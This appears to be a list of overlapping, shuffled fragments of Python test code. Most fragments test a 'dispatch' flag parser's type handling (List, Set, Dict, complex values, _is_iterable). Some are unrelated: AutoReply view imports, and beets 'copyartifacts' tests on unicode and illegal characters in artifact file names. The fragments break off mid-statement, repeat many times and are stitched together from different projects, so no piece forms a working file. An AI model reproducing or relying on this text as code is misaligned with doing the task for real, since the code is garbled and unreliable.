"_is_iterable(set) assert _is_iterable(List) assert _is_iterable(Dict) assert _is_iterable(Sequence) assert _is_iterable(Mapping) class A: pass #",
"== complex(6.7, 0) opt = Option('type', AType) opt.setval('hello') assert isinstance(opt.value, AType) assert opt.value.val",
"Dict[str, float]): pass with raises(ValueError): o.setval('{one:1.0,two:2.5,three:the third number,four:4}') opt.setval('4+3i') f(['--keys', '{one:1,two:this is the",
"_from_typing_module(Sequence) assert _from_typing_module(Dict[int, str]) assert not _from_typing_module(list) assert not _from_typing_module(int) assert not _from_typing_module(dict)",
"from dispatch.flags import Option, _from_typing_module, _is_iterable class AType: def __init__(self, val): self.val =",
"= Option('num', complex) opt.setval('5+9j') assert opt.value == complex(5, 9) opt.setval(complex(7, 2)) assert opt.value",
"'{one:1,two:this is the number two}']) def testIsIterable(): assert _is_iterable(str) assert _is_iterable(list) assert _is_iterable(dict)",
"def __init__(self, val): self.val = val def testTypeParsing(): o = Option('o', List[int]) o.setval('[1,2,3,4]')",
"list) for got, want in zip(o.value, [1, 2, 3, 4]): assert isinstance(got, str)",
"== complex(5, 9) opt.setval(complex(7, 2)) assert opt.value == complex(7, 2) opt.setval(6.7) assert opt.value",
"_is_iterable(Mapping) class A: pass # noqa assert not _is_iterable(int) assert not _is_iterable(float) assert",
"assert isinstance(want, float) assert got == want assert got == want o =",
"assert opt.value == complex(6.7, 0) opt = Option('type', AType) opt.setval('hello') assert isinstance(opt.value, AType)",
"def testBadTypeParsing(): o = Option('outout', Dict[str, float]) opt = Option('num', complex) @command def",
"[1, 2, 3, 4]): assert isinstance(got, str) assert isinstance(want, int) assert int(got) ==",
"Option('type', AType) opt.setval('hello') assert isinstance(opt.value, AType) assert opt.value.val == 'hello' def testBadTypeParsing(): o",
"o = Option('outout', Dict[str, float]) opt = Option('num', complex) @command def f(keys: Dict[str,",
"assert opt.value == complex(7, 2) opt.setval(6.7) assert opt.value == complex(6.7, 0) opt =",
"AType) opt.setval('hello') assert isinstance(opt.value, AType) assert opt.value.val == 'hello' def testBadTypeParsing(): o =",
"== 'hello' def testBadTypeParsing(): o = Option('outout', Dict[str, float]) opt = Option('num', complex)",
"2, 3, 4]): assert isinstance(got, int) assert isinstance(want, int) assert got == want",
"k, v in o.value.items(): assert isinstance(k, str) assert isinstance(v, int) opt = Option('num',",
"= Option('num', complex) @command def f(keys: Dict[str, float]): pass with raises(ValueError): o.setval('{one:1.0,two:2.5,three:the third",
"assert _from_typing_module(Dict[int, str]) assert not _from_typing_module(list) assert not _from_typing_module(int) assert not _from_typing_module(dict) class",
"= Option('o', List[int]) o.setval('[1,2,3,4]') assert isinstance(o.value, list) for got, want in zip(o.value, [1,",
"for got, want in zip(o.value, [1.5, 2.6, 3.7, 4.8]): assert isinstance(got, float) assert",
"assert isinstance(v, int) opt = Option('num', complex) opt.setval('5+9j') assert opt.value == complex(5, 9)",
"not _is_iterable(int) assert not _is_iterable(float) assert not _is_iterable(A) assert _is_iterable([1, 2, 3]) def",
"os.path import dirname sys.path.insert(0, dirname(dirname(__file__))) from typing import List, Set, Dict, Sequence, Mapping",
"sys.path.insert(0, dirname(dirname(__file__))) from typing import List, Set, Dict, Sequence, Mapping from dispatch import",
"class AType: def __init__(self, val): self.val = val def testTypeParsing(): o = Option('o',",
"assert isinstance(want, int) assert got == want o = Option('o', list) o.setval('[1,2,3,4]') assert",
"List[int]) o.setval('[1,2,3,4]') assert isinstance(o.value, list) for got, want in zip(o.value, [1, 2, 3,",
"import List, Set, Dict, Sequence, Mapping from dispatch import command from dispatch.flags import",
"isinstance(got, str) assert isinstance(want, int) assert int(got) == want assert got == str(want)",
"o.setval('{one:1,two:2,three:3}') assert isinstance(o.value, dict) for k, v in o.value.items(): assert isinstance(k, str) assert",
"assert opt.value == complex(5, 9) opt.setval(complex(7, 2)) assert opt.value == complex(7, 2) opt.setval(6.7)",
"@command def f(keys: Dict[str, float]): pass with raises(ValueError): o.setval('{one:1.0,two:2.5,three:the third number,four:4}') opt.setval('4+3i') f(['--keys',",
"the number two}']) def testIsIterable(): assert _is_iterable(str) assert _is_iterable(list) assert _is_iterable(dict) assert _is_iterable(set)",
"noqa assert not _is_iterable(int) assert not _is_iterable(float) assert not _is_iterable(A) assert _is_iterable([1, 2,",
"import Option, _from_typing_module, _is_iterable class AType: def __init__(self, val): self.val = val def",
"_from_typing_module(List) assert _from_typing_module(Sequence) assert _from_typing_module(Dict[int, str]) assert not _from_typing_module(list) assert not _from_typing_module(int) assert",
"= Option('type', AType) opt.setval('hello') assert isinstance(opt.value, AType) assert opt.value.val == 'hello' def testBadTypeParsing():",
"want in zip(o.value, [1.5, 2.6, 3.7, 4.8]): assert isinstance(got, float) assert isinstance(want, float)",
"assert isinstance(opt.value, AType) assert opt.value.val == 'hello' def testBadTypeParsing(): o = Option('outout', Dict[str,",
"zip(o.value, [1.5, 2.6, 3.7, 4.8]): assert isinstance(got, float) assert isinstance(want, float) assert got",
"o.setval('{one:1.0,two:2.5,three:the third number,four:4}') opt.setval('4+3i') f(['--keys', '{one:1,two:this is the number two}']) def testIsIterable(): assert",
"Option('o', Set[float]) o.setval('[1.5,2.6,3.7,4.8]') assert isinstance(o.value, set) for got, want in zip(o.value, [1.5, 2.6,",
"2.6, 3.7, 4.8]): assert isinstance(got, float) assert isinstance(want, float) assert got == want",
"assert _is_iterable(Mapping) class A: pass # noqa assert not _is_iterable(int) assert not _is_iterable(float)",
"= val def testTypeParsing(): o = Option('o', List[int]) o.setval('[1,2,3,4]') assert isinstance(o.value, list) for",
"in zip(o.value, [1, 2, 3, 4]): assert isinstance(got, str) assert isinstance(want, int) assert",
"opt.setval('5+9j') assert opt.value == complex(5, 9) opt.setval(complex(7, 2)) assert opt.value == complex(7, 2)",
"class A: pass # noqa assert not _is_iterable(int) assert not _is_iterable(float) assert not",
"not _from_typing_module(int) assert not _from_typing_module(dict) class A: pass # noqa assert not _from_typing_module(A)",
"got, want in zip(o.value, [1.5, 2.6, 3.7, 4.8]): assert isinstance(got, float) assert isinstance(want,",
"assert _is_iterable(list) assert _is_iterable(dict) assert _is_iterable(set) assert _is_iterable(List) assert _is_iterable(Dict) assert _is_iterable(Sequence) assert",
"3, 4]): assert isinstance(got, int) assert isinstance(want, int) assert got == want o",
"f(['--keys', '{one:1,two:this is the number two}']) def testIsIterable(): assert _is_iterable(str) assert _is_iterable(list) assert",
"3.7, 4.8]): assert isinstance(got, float) assert isinstance(want, float) assert got == want assert",
"want assert got == str(want) o = Option('o', Set[float]) o.setval('[1.5,2.6,3.7,4.8]') assert isinstance(o.value, set)",
"typing import List, Set, Dict, Sequence, Mapping from dispatch import command from dispatch.flags",
"complex(5, 9) opt.setval(complex(7, 2)) assert opt.value == complex(7, 2) opt.setval(6.7) assert opt.value ==",
"command from dispatch.flags import Option, _from_typing_module, _is_iterable class AType: def __init__(self, val): self.val",
"dirname(dirname(__file__))) from typing import List, Set, Dict, Sequence, Mapping from dispatch import command",
"3, 4]): assert isinstance(got, str) assert isinstance(want, int) assert int(got) == want assert",
"assert isinstance(want, int) assert int(got) == want assert got == str(want) o =",
"v in o.value.items(): assert isinstance(k, str) assert isinstance(v, int) opt = Option('num', complex)",
"2, 3, 4]): assert isinstance(got, str) assert isinstance(want, int) assert int(got) == want",
"testTypeParsing(): o = Option('o', List[int]) o.setval('[1,2,3,4]') assert isinstance(o.value, list) for got, want in",
"= Option('o', Set[float]) o.setval('[1.5,2.6,3.7,4.8]') assert isinstance(o.value, set) for got, want in zip(o.value, [1.5,",
"def testTypeParsing(): o = Option('o', List[int]) o.setval('[1,2,3,4]') assert isinstance(o.value, list) for got, want",
"dispatch import command from dispatch.flags import Option, _from_typing_module, _is_iterable class AType: def __init__(self,",
"zip(o.value, [1, 2, 3, 4]): assert isinstance(got, str) assert isinstance(want, int) assert int(got)",
"got == str(want) o = Option('o', Set[float]) o.setval('[1.5,2.6,3.7,4.8]') assert isinstance(o.value, set) for got,",
"int) opt = Option('num', complex) opt.setval('5+9j') assert opt.value == complex(5, 9) opt.setval(complex(7, 2))",
"Dict[str, int]) o.setval('{one:1,two:2,three:3}') assert isinstance(o.value, dict) for k, v in o.value.items(): assert isinstance(k,",
"opt.setval(complex(7, 2)) assert opt.value == complex(7, 2) opt.setval(6.7) assert opt.value == complex(6.7, 0)",
"== complex(7, 2) opt.setval(6.7) assert opt.value == complex(6.7, 0) opt = Option('type', AType)",
"is the number two}']) def testIsIterable(): assert _is_iterable(str) assert _is_iterable(list) assert _is_iterable(dict) assert",
"_is_iterable(list) assert _is_iterable(dict) assert _is_iterable(set) assert _is_iterable(List) assert _is_iterable(Dict) assert _is_iterable(Sequence) assert _is_iterable(Mapping)",
"not _is_iterable(float) assert not _is_iterable(A) assert _is_iterable([1, 2, 3]) def testFromTypingModule(): assert _from_typing_module(List)",
"Option('o', list) o.setval('[1,2,3,4]') assert isinstance(o.value, list) for got, want in zip(o.value, [1, 2,",
"_is_iterable(List) assert _is_iterable(Dict) assert _is_iterable(Sequence) assert _is_iterable(Mapping) class A: pass # noqa assert",
"assert not _is_iterable(int) assert not _is_iterable(float) assert not _is_iterable(A) assert _is_iterable([1, 2, 3])",
"o.setval('[1.5,2.6,3.7,4.8]') assert isinstance(o.value, set) for got, want in zip(o.value, [1.5, 2.6, 3.7, 4.8]):",
"assert _is_iterable(str) assert _is_iterable(list) assert _is_iterable(dict) assert _is_iterable(set) assert _is_iterable(List) assert _is_iterable(Dict) assert",
"from typing import List, Set, Dict, Sequence, Mapping from dispatch import command from",
"testIsIterable(): assert _is_iterable(str) assert _is_iterable(list) assert _is_iterable(dict) assert _is_iterable(set) assert _is_iterable(List) assert _is_iterable(Dict)",
"_is_iterable(int) assert not _is_iterable(float) assert not _is_iterable(A) assert _is_iterable([1, 2, 3]) def testFromTypingModule():",
"for got, want in zip(o.value, [1, 2, 3, 4]): assert isinstance(got, str) assert",
"== want assert got == want o = Option('o', Dict[str, int]) o.setval('{one:1,two:2,three:3}') assert",
"int) assert int(got) == want assert got == str(want) o = Option('o', Set[float])",
"third number,four:4}') opt.setval('4+3i') f(['--keys', '{one:1,two:this is the number two}']) def testIsIterable(): assert _is_iterable(str)",
"not _from_typing_module(list) assert not _from_typing_module(int) assert not _from_typing_module(dict) class A: pass # noqa",
"assert got == want o = Option('o', Dict[str, int]) o.setval('{one:1,two:2,three:3}') assert isinstance(o.value, dict)",
"list) o.setval('[1,2,3,4]') assert isinstance(o.value, list) for got, want in zip(o.value, [1, 2, 3,",
"A: pass # noqa assert not _is_iterable(int) assert not _is_iterable(float) assert not _is_iterable(A)",
"_is_iterable(Sequence) assert _is_iterable(Mapping) class A: pass # noqa assert not _is_iterable(int) assert not",
"want in zip(o.value, [1, 2, 3, 4]): assert isinstance(got, int) assert isinstance(want, int)",
"import raises import sys from os.path import dirname sys.path.insert(0, dirname(dirname(__file__))) from typing import",
"list) for got, want in zip(o.value, [1, 2, 3, 4]): assert isinstance(got, int)",
"Option, _from_typing_module, _is_iterable class AType: def __init__(self, val): self.val = val def testTypeParsing():",
"Set, Dict, Sequence, Mapping from dispatch import command from dispatch.flags import Option, _from_typing_module,",
"complex(7, 2) opt.setval(6.7) assert opt.value == complex(6.7, 0) opt = Option('type', AType) opt.setval('hello')",
"def testFromTypingModule(): assert _from_typing_module(List) assert _from_typing_module(Sequence) assert _from_typing_module(Dict[int, str]) assert not _from_typing_module(list) assert",
"assert isinstance(k, str) assert isinstance(v, int) opt = Option('num', complex) opt.setval('5+9j') assert opt.value",
"== want assert got == str(want) o = Option('o', Set[float]) o.setval('[1.5,2.6,3.7,4.8]') assert isinstance(o.value,",
"testBadTypeParsing(): o = Option('outout', Dict[str, float]) opt = Option('num', complex) @command def f(keys:",
"from pytest import raises import sys from os.path import dirname sys.path.insert(0, dirname(dirname(__file__))) from",
"assert isinstance(got, str) assert isinstance(want, int) assert int(got) == want assert got ==",
"2, 3]) def testFromTypingModule(): assert _from_typing_module(List) assert _from_typing_module(Sequence) assert _from_typing_module(Dict[int, str]) assert not",
"2) opt.setval(6.7) assert opt.value == complex(6.7, 0) opt = Option('type', AType) opt.setval('hello') assert",
"got, want in zip(o.value, [1, 2, 3, 4]): assert isinstance(got, str) assert isinstance(want,",
"'hello' def testBadTypeParsing(): o = Option('outout', Dict[str, float]) opt = Option('num', complex) @command",
"Option('o', List[int]) o.setval('[1,2,3,4]') assert isinstance(o.value, list) for got, want in zip(o.value, [1, 2,",
"want assert got == want o = Option('o', Dict[str, int]) o.setval('{one:1,two:2,three:3}') assert isinstance(o.value,",
"assert not _is_iterable(A) assert _is_iterable([1, 2, 3]) def testFromTypingModule(): assert _from_typing_module(List) assert _from_typing_module(Sequence)",
"zip(o.value, [1, 2, 3, 4]): assert isinstance(got, int) assert isinstance(want, int) assert got",
"_is_iterable(Dict) assert _is_iterable(Sequence) assert _is_iterable(Mapping) class A: pass # noqa assert not _is_iterable(int)",
"assert not _is_iterable(float) assert not _is_iterable(A) assert _is_iterable([1, 2, 3]) def testFromTypingModule(): assert",
"in zip(o.value, [1, 2, 3, 4]): assert isinstance(got, int) assert isinstance(want, int) assert",
"Set[float]) o.setval('[1.5,2.6,3.7,4.8]') assert isinstance(o.value, set) for got, want in zip(o.value, [1.5, 2.6, 3.7,",
"from os.path import dirname sys.path.insert(0, dirname(dirname(__file__))) from typing import List, Set, Dict, Sequence,",
"isinstance(o.value, dict) for k, v in o.value.items(): assert isinstance(k, str) assert isinstance(v, int)",
"assert isinstance(got, int) assert isinstance(want, int) assert got == want o = Option('o',",
"raises(ValueError): o.setval('{one:1.0,two:2.5,three:the third number,four:4}') opt.setval('4+3i') f(['--keys', '{one:1,two:this is the number two}']) def testIsIterable():",
"assert _is_iterable([1, 2, 3]) def testFromTypingModule(): assert _from_typing_module(List) assert _from_typing_module(Sequence) assert _from_typing_module(Dict[int, str])",
"int(got) == want assert got == str(want) o = Option('o', Set[float]) o.setval('[1.5,2.6,3.7,4.8]') assert",
"def testIsIterable(): assert _is_iterable(str) assert _is_iterable(list) assert _is_iterable(dict) assert _is_iterable(set) assert _is_iterable(List) assert",
"assert isinstance(o.value, set) for got, want in zip(o.value, [1.5, 2.6, 3.7, 4.8]): assert",
"val def testTypeParsing(): o = Option('o', List[int]) o.setval('[1,2,3,4]') assert isinstance(o.value, list) for got,",
"<filename>tests/flag_test.py import pytest from pytest import raises import sys from os.path import dirname",
"isinstance(o.value, list) for got, want in zip(o.value, [1, 2, 3, 4]): assert isinstance(got,",
"assert not _from_typing_module(list) assert not _from_typing_module(int) assert not _from_typing_module(dict) class A: pass #",
"opt.value == complex(7, 2) opt.setval(6.7) assert opt.value == complex(6.7, 0) opt = Option('type',",
"assert _from_typing_module(List) assert _from_typing_module(Sequence) assert _from_typing_module(Dict[int, str]) assert not _from_typing_module(list) assert not _from_typing_module(int)",
"AType: def __init__(self, val): self.val = val def testTypeParsing(): o = Option('o', List[int])",
"isinstance(k, str) assert isinstance(v, int) opt = Option('num', complex) opt.setval('5+9j') assert opt.value ==",
"import pytest from pytest import raises import sys from os.path import dirname sys.path.insert(0,",
"dispatch.flags import Option, _from_typing_module, _is_iterable class AType: def __init__(self, val): self.val = val",
"o = Option('o', Dict[str, int]) o.setval('{one:1,two:2,three:3}') assert isinstance(o.value, dict) for k, v in",
"Dict, Sequence, Mapping from dispatch import command from dispatch.flags import Option, _from_typing_module, _is_iterable",
"_is_iterable class AType: def __init__(self, val): self.val = val def testTypeParsing(): o =",
"Sequence, Mapping from dispatch import command from dispatch.flags import Option, _from_typing_module, _is_iterable class",
"assert opt.value.val == 'hello' def testBadTypeParsing(): o = Option('outout', Dict[str, float]) opt =",
"got, want in zip(o.value, [1, 2, 3, 4]): assert isinstance(got, int) assert isinstance(want,",
"set) for got, want in zip(o.value, [1.5, 2.6, 3.7, 4.8]): assert isinstance(got, float)",
"isinstance(v, int) opt = Option('num', complex) opt.setval('5+9j') assert opt.value == complex(5, 9) opt.setval(complex(7,",
"9) opt.setval(complex(7, 2)) assert opt.value == complex(7, 2) opt.setval(6.7) assert opt.value == complex(6.7,",
"assert _from_typing_module(Sequence) assert _from_typing_module(Dict[int, str]) assert not _from_typing_module(list) assert not _from_typing_module(int) assert not",
"float) assert got == want assert got == want o = Option('o', Dict[str,",
"_from_typing_module(list) assert not _from_typing_module(int) assert not _from_typing_module(dict) class A: pass # noqa assert",
"o = Option('o', list) o.setval('[1,2,3,4]') assert isinstance(o.value, list) for got, want in zip(o.value,",
"int]) o.setval('{one:1,two:2,three:3}') assert isinstance(o.value, dict) for k, v in o.value.items(): assert isinstance(k, str)",
"assert _is_iterable(Sequence) assert _is_iterable(Mapping) class A: pass # noqa assert not _is_iterable(int) assert",
"4.8]): assert isinstance(got, float) assert isinstance(want, float) assert got == want assert got",
"isinstance(o.value, set) for got, want in zip(o.value, [1.5, 2.6, 3.7, 4.8]): assert isinstance(got,",
"isinstance(want, float) assert got == want assert got == want o = Option('o',",
"isinstance(got, float) assert isinstance(want, float) assert got == want assert got == want",
"List, Set, Dict, Sequence, Mapping from dispatch import command from dispatch.flags import Option,",
"assert _is_iterable(Dict) assert _is_iterable(Sequence) assert _is_iterable(Mapping) class A: pass # noqa assert not",
"opt.value.val == 'hello' def testBadTypeParsing(): o = Option('outout', Dict[str, float]) opt = Option('num',",
"= Option('outout', Dict[str, float]) opt = Option('num', complex) @command def f(keys: Dict[str, float]):",
"two}']) def testIsIterable(): assert _is_iterable(str) assert _is_iterable(list) assert _is_iterable(dict) assert _is_iterable(set) assert _is_iterable(List)",
"f(keys: Dict[str, float]): pass with raises(ValueError): o.setval('{one:1.0,two:2.5,three:the third number,four:4}') opt.setval('4+3i') f(['--keys', '{one:1,two:this is",
"assert int(got) == want assert got == str(want) o = Option('o', Set[float]) o.setval('[1.5,2.6,3.7,4.8]')",
"with raises(ValueError): o.setval('{one:1.0,two:2.5,three:the third number,four:4}') opt.setval('4+3i') f(['--keys', '{one:1,two:this is the number two}']) def",
"raises import sys from os.path import dirname sys.path.insert(0, dirname(dirname(__file__))) from typing import List,",
"int) assert got == want o = Option('o', list) o.setval('[1,2,3,4]') assert isinstance(o.value, list)",
"opt = Option('num', complex) @command def f(keys: Dict[str, float]): pass with raises(ValueError): o.setval('{one:1.0,two:2.5,three:the",
"got == want o = Option('o', list) o.setval('[1,2,3,4]') assert isinstance(o.value, list) for got,",
"2)) assert opt.value == complex(7, 2) opt.setval(6.7) assert opt.value == complex(6.7, 0) opt",
"pass # noqa assert not _is_iterable(int) assert not _is_iterable(float) assert not _is_iterable(A) assert",
"str]) assert not _from_typing_module(list) assert not _from_typing_module(int) assert not _from_typing_module(dict) class A: pass",
"assert _is_iterable(List) assert _is_iterable(Dict) assert _is_iterable(Sequence) assert _is_iterable(Mapping) class A: pass # noqa",
"AType) assert opt.value.val == 'hello' def testBadTypeParsing(): o = Option('outout', Dict[str, float]) opt",
"str(want) o = Option('o', Set[float]) o.setval('[1.5,2.6,3.7,4.8]') assert isinstance(o.value, set) for got, want in",
"[1.5, 2.6, 3.7, 4.8]): assert isinstance(got, float) assert isinstance(want, float) assert got ==",
"assert got == str(want) o = Option('o', Set[float]) o.setval('[1.5,2.6,3.7,4.8]') assert isinstance(o.value, set) for",
"== str(want) o = Option('o', Set[float]) o.setval('[1.5,2.6,3.7,4.8]') assert isinstance(o.value, set) for got, want",
"complex(6.7, 0) opt = Option('type', AType) opt.setval('hello') assert isinstance(opt.value, AType) assert opt.value.val ==",
"= Option('o', Dict[str, int]) o.setval('{one:1,two:2,three:3}') assert isinstance(o.value, dict) for k, v in o.value.items():",
"assert isinstance(got, float) assert isinstance(want, float) assert got == want assert got ==",
"assert isinstance(o.value, dict) for k, v in o.value.items(): assert isinstance(k, str) assert isinstance(v,",
"self.val = val def testTypeParsing(): o = Option('o', List[int]) o.setval('[1,2,3,4]') assert isinstance(o.value, list)",
"complex) @command def f(keys: Dict[str, float]): pass with raises(ValueError): o.setval('{one:1.0,two:2.5,three:the third number,four:4}') opt.setval('4+3i')",
"float) assert isinstance(want, float) assert got == want assert got == want o",
"_is_iterable(float) assert not _is_iterable(A) assert _is_iterable([1, 2, 3]) def testFromTypingModule(): assert _from_typing_module(List) assert",
"o = Option('o', List[int]) o.setval('[1,2,3,4]') assert isinstance(o.value, list) for got, want in zip(o.value,",
"_is_iterable(str) assert _is_iterable(list) assert _is_iterable(dict) assert _is_iterable(set) assert _is_iterable(List) assert _is_iterable(Dict) assert _is_iterable(Sequence)",
"o.setval('[1,2,3,4]') assert isinstance(o.value, list) for got, want in zip(o.value, [1, 2, 3, 4]):",
"int) assert isinstance(want, int) assert got == want o = Option('o', list) o.setval('[1,2,3,4]')",
"== want o = Option('o', Dict[str, int]) o.setval('{one:1,two:2,three:3}') assert isinstance(o.value, dict) for k,",
"assert _is_iterable(dict) assert _is_iterable(set) assert _is_iterable(List) assert _is_iterable(Dict) assert _is_iterable(Sequence) assert _is_iterable(Mapping) class",
"o = Option('o', Set[float]) o.setval('[1.5,2.6,3.7,4.8]') assert isinstance(o.value, set) for got, want in zip(o.value,",
"number,four:4}') opt.setval('4+3i') f(['--keys', '{one:1,two:this is the number two}']) def testIsIterable(): assert _is_iterable(str) assert",
"assert isinstance(o.value, list) for got, want in zip(o.value, [1, 2, 3, 4]): assert",
"not _is_iterable(A) assert _is_iterable([1, 2, 3]) def testFromTypingModule(): assert _from_typing_module(List) assert _from_typing_module(Sequence) assert",
"float]): pass with raises(ValueError): o.setval('{one:1.0,two:2.5,three:the third number,four:4}') opt.setval('4+3i') f(['--keys', '{one:1,two:this is the number",
"pass with raises(ValueError): o.setval('{one:1.0,two:2.5,three:the third number,four:4}') opt.setval('4+3i') f(['--keys', '{one:1,two:this is the number two}'])",
"want o = Option('o', list) o.setval('[1,2,3,4]') assert isinstance(o.value, list) for got, want in",
"0) opt = Option('type', AType) opt.setval('hello') assert isinstance(opt.value, AType) assert opt.value.val == 'hello'",
"for k, v in o.value.items(): assert isinstance(k, str) assert isinstance(v, int) opt =",
"3]) def testFromTypingModule(): assert _from_typing_module(List) assert _from_typing_module(Sequence) assert _from_typing_module(Dict[int, str]) assert not _from_typing_module(list)",
"in o.value.items(): assert isinstance(k, str) assert isinstance(v, int) opt = Option('num', complex) opt.setval('5+9j')"
] |
[
"from .add import AutoReplyAddView, AutoReplyAddExecodeView from .validate import ContentValidationView from .tag import AutoReplyTagPopularityQueryView"
] |
[
"self._run_importer() self.assert_in_lib_dir('Tag Artist', 'Tag Album', u'\\xe4rtifact.file') def test_import_dir_with_unicode_character_in_artifact_name_move(self): config['import']['move'] = True open(os.path.join(self.album_path, u'\\xe4rtifact.file'),",
"self._run_importer() self.assert_in_lib_dir('Tag Artist', 'Tag Album', u'\\xe4rtifact.file') def test_import_dir_with_illegal_character_in_album_name(self): config['paths']['ext:file'] = unicode('$albumpath/$artist - $album')",
"filename character used in the album name open(os.path.join(self.album_path, u'artifact.file'), 'a').close() medium = self._create_medium(os.path.join(self.album_path,",
"self._create_medium(os.path.join(self.album_path, 'track_1.mp3'), 'full.mp3') self.import_media = [medium] self._run_importer() self.assert_in_lib_dir('Tag Artist', 'Tag Album', u'\\xe4rtifact.file') def",
"unicode('$albumpath/$artist - $album') # Create import directory, illegal filename character used in the",
"import os import sys from helper import CopyArtifactsTestCase from beets import config class",
"'full.mp3', 'Tag Album?') self.import_media = [medium] self._run_importer() self.assert_in_lib_dir('Tag Artist', 'Tag Album_', u'Tag Artist",
"\"\"\" def setUp(self): super(CopyArtifactsFilename, self).setUp() self._set_import_dir() self.album_path = os.path.join(self.import_dir, 'the_album') os.makedirs(self.album_path) self._setup_import_session(autotag=False) config['copyartifacts']['extensions']",
"test_import_dir_with_unicode_character_in_artifact_name_copy(self): open(os.path.join(self.album_path, u'\\xe4rtifact.file'), 'a').close() medium = self._create_medium(os.path.join(self.album_path, 'track_1.mp3'), 'full.mp3') self.import_media = [medium] self._run_importer()",
"self.assert_in_lib_dir('Tag Artist', 'Tag Album', u'\\xe4rtifact.file') def test_import_dir_with_illegal_character_in_album_name(self): config['paths']['ext:file'] = unicode('$albumpath/$artist - $album') #",
"sys from helper import CopyArtifactsTestCase from beets import config class CopyArtifactsFilename(CopyArtifactsTestCase): \"\"\" Tests",
"'a').close() medium = self._create_medium(os.path.join(self.album_path, 'track_1.mp3'), 'full.mp3') self.import_media = [medium] self._run_importer() self.assert_in_lib_dir('Tag Artist', 'Tag",
"= os.path.join(self.import_dir, 'the_album') os.makedirs(self.album_path) self._setup_import_session(autotag=False) config['copyartifacts']['extensions'] = '.file' def test_import_dir_with_unicode_character_in_artifact_name_copy(self): open(os.path.join(self.album_path, u'\\xe4rtifact.file'), 'a').close()",
"directory, illegal filename character used in the album name open(os.path.join(self.album_path, u'artifact.file'), 'a').close() medium",
"the album name open(os.path.join(self.album_path, u'artifact.file'), 'a').close() medium = self._create_medium(os.path.join(self.album_path, 'track_1.mp3'), 'full.mp3', 'Tag Album?')",
"medium = self._create_medium(os.path.join(self.album_path, 'track_1.mp3'), 'full.mp3', 'Tag Album?') self.import_media = [medium] self._run_importer() self.assert_in_lib_dir('Tag Artist',",
"'full.mp3') self.import_media = [medium] self._run_importer() self.assert_in_lib_dir('Tag Artist', 'Tag Album', u'\\xe4rtifact.file') def test_import_dir_with_illegal_character_in_album_name(self): config['paths']['ext:file']",
"with filenames containing unicode characters \"\"\" def setUp(self): super(CopyArtifactsFilename, self).setUp() self._set_import_dir() self.album_path =",
"def test_import_dir_with_unicode_character_in_artifact_name_move(self): config['import']['move'] = True open(os.path.join(self.album_path, u'\\xe4rtifact.file'), 'a').close() medium = self._create_medium(os.path.join(self.album_path, 'track_1.mp3'), 'full.mp3')",
"= True open(os.path.join(self.album_path, u'\\xe4rtifact.file'), 'a').close() medium = self._create_medium(os.path.join(self.album_path, 'track_1.mp3'), 'full.mp3') self.import_media = [medium]",
"config class CopyArtifactsFilename(CopyArtifactsTestCase): \"\"\" Tests to check handling of artifacts with filenames containing",
"handling of artifacts with filenames containing unicode characters \"\"\" def setUp(self): super(CopyArtifactsFilename, self).setUp()",
"'Tag Album?') self.import_media = [medium] self._run_importer() self.assert_in_lib_dir('Tag Artist', 'Tag Album_', u'Tag Artist -",
"= self._create_medium(os.path.join(self.album_path, 'track_1.mp3'), 'full.mp3', 'Tag Album?') self.import_media = [medium] self._run_importer() self.assert_in_lib_dir('Tag Artist', 'Tag",
"= '.file' def test_import_dir_with_unicode_character_in_artifact_name_copy(self): open(os.path.join(self.album_path, u'\\xe4rtifact.file'), 'a').close() medium = self._create_medium(os.path.join(self.album_path, 'track_1.mp3'), 'full.mp3') self.import_media",
"u'\\xe4rtifact.file'), 'a').close() medium = self._create_medium(os.path.join(self.album_path, 'track_1.mp3'), 'full.mp3') self.import_media = [medium] self._run_importer() self.assert_in_lib_dir('Tag Artist',",
"to check handling of artifacts with filenames containing unicode characters \"\"\" def setUp(self):",
"containing unicode characters \"\"\" def setUp(self): super(CopyArtifactsFilename, self).setUp() self._set_import_dir() self.album_path = os.path.join(self.import_dir, 'the_album')",
"u'\\xe4rtifact.file') def test_import_dir_with_illegal_character_in_album_name(self): config['paths']['ext:file'] = unicode('$albumpath/$artist - $album') # Create import directory, illegal",
"def setUp(self): super(CopyArtifactsFilename, self).setUp() self._set_import_dir() self.album_path = os.path.join(self.import_dir, 'the_album') os.makedirs(self.album_path) self._setup_import_session(autotag=False) config['copyartifacts']['extensions'] =",
"import CopyArtifactsTestCase from beets import config class CopyArtifactsFilename(CopyArtifactsTestCase): \"\"\" Tests to check handling",
"[medium] self._run_importer() self.assert_in_lib_dir('Tag Artist', 'Tag Album', u'\\xe4rtifact.file') def test_import_dir_with_unicode_character_in_artifact_name_move(self): config['import']['move'] = True open(os.path.join(self.album_path,",
"def test_import_dir_with_unicode_character_in_artifact_name_copy(self): open(os.path.join(self.album_path, u'\\xe4rtifact.file'), 'a').close() medium = self._create_medium(os.path.join(self.album_path, 'track_1.mp3'), 'full.mp3') self.import_media = [medium]",
"self.import_media = [medium] self._run_importer() self.assert_in_lib_dir('Tag Artist', 'Tag Album', u'\\xe4rtifact.file') def test_import_dir_with_illegal_character_in_album_name(self): config['paths']['ext:file'] =",
"self.assert_in_lib_dir('Tag Artist', 'Tag Album', u'\\xe4rtifact.file') def test_import_dir_with_unicode_character_in_artifact_name_move(self): config['import']['move'] = True open(os.path.join(self.album_path, u'\\xe4rtifact.file'), 'a').close()",
"import config class CopyArtifactsFilename(CopyArtifactsTestCase): \"\"\" Tests to check handling of artifacts with filenames",
"beets import config class CopyArtifactsFilename(CopyArtifactsTestCase): \"\"\" Tests to check handling of artifacts with",
"= unicode('$albumpath/$artist - $album') # Create import directory, illegal filename character used in",
"CopyArtifactsFilename(CopyArtifactsTestCase): \"\"\" Tests to check handling of artifacts with filenames containing unicode characters",
"config['paths']['ext:file'] = unicode('$albumpath/$artist - $album') # Create import directory, illegal filename character used",
"# Create import directory, illegal filename character used in the album name open(os.path.join(self.album_path,",
"Artist', 'Tag Album', u'\\xe4rtifact.file') def test_import_dir_with_unicode_character_in_artifact_name_move(self): config['import']['move'] = True open(os.path.join(self.album_path, u'\\xe4rtifact.file'), 'a').close() medium",
"helper import CopyArtifactsTestCase from beets import config class CopyArtifactsFilename(CopyArtifactsTestCase): \"\"\" Tests to check",
"= self._create_medium(os.path.join(self.album_path, 'track_1.mp3'), 'full.mp3') self.import_media = [medium] self._run_importer() self.assert_in_lib_dir('Tag Artist', 'Tag Album', u'\\xe4rtifact.file')",
